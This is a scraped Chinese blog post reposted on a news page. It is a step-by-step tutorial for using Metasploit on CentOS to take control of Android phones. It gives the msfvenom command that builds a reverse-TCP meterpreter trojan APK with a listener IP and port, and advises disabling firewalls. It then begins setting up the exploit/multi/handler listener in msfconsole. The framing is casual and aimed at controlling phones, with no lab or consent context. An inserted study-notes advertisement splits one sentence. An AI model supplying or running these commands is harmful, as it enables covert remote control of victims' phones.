你的位置:首页 > 信息动态 > 新闻中心
信息动态
联系我们

Centos Linux下使用Metasploit渗透android,kotlin枚举类

2021/12/30 13:47:26

Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。

这篇文档只适合在Ce

《Android学习笔记总结+最新移动架构视频+大厂安卓面试真题+项目实战源码讲义》

【docs.qq.com/doc/DSkNLaERkbnFoS0ZF】 完整内容开源分享

ntos Linux已经安装了Metasploit的大伙。没有安装Metasploit的小伙们,可以前往

https://blog.csdn.net/wyvbboy/article/details/51526640

博客去浏览并安装,然后再回来~(如果此博客的安装已经过期了,官方找或者网上找)

看完Metasploit简介后,其下有一个工具msfvenom可以生成木马,打开linux终端,最好登录root,怕出错,然后输入命令

$ msfvenom

Enter下看看都啥?一大堆指令让你烦~

先查看一下所有类型的攻击负荷(看成木马也行),输入命令

$ msfvenom --list payloads

Enter下来,数据很多,我们从里面找Android类型的就行,我是来操控手机的,不会干其它的

复制一下黄色框的字段,tcp格式的,接下来会用到

android/meterpreter/reverse_tcp

知道了“木马”的名称,还得知道终端的ip,输入ifconfig查看内网ip(俺的是本地测试的)

$ ifconfig

ip拿到了,还不赶紧的开始生成木木马-_-,msfvenom兄弟,靠你了,输入

$ msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.122.129 LPORT=3333 R > first.apk

-p, --payload 使用攻击负荷。指定一个’-'或者输入(stdin)用户自定义的payloads(攻击负荷)。

LHOST ip地址

LPORT 自定义端口(注意,那些所谓的防火墙全踏马都要关闭,记得端口要放行且没被占用,不然渗透没软用)

生成的木马最好能放在一个可以访问的文件夹上,我直接first.apk,在终端目前路径上可以看到有文件生成。如果没有,那就是失败了,检查一下你的端口是否占用!生成成功的编译大概会出现Payload size: 10181 bytes字段

木马生成完毕,msfvenom兄弟的工作就基本完工了,接下来就有请msfconsole上场了,没错,就是打开metasploit的控制台,着手配置相关信息,开始渗透了~

直接输入msfconsole

$ msfconsole

长久看多了单调代码的你,下面的图形代码有没有让你灰色的世界多点点色彩~~

谈正事~我们需要配置什么呢?前面生成木马的时候不是设置了ip和端口吗?现在我们也要在控制台上配置ip和端口,做监听来的

要做的流程大概是这些

(在msfconsole模式下)加载exploit模块

msf > use exploit/multi/handler

(exploit模式下)选择之前我们粘贴过一次的攻击载荷:android/meterpreter/reverse_tcp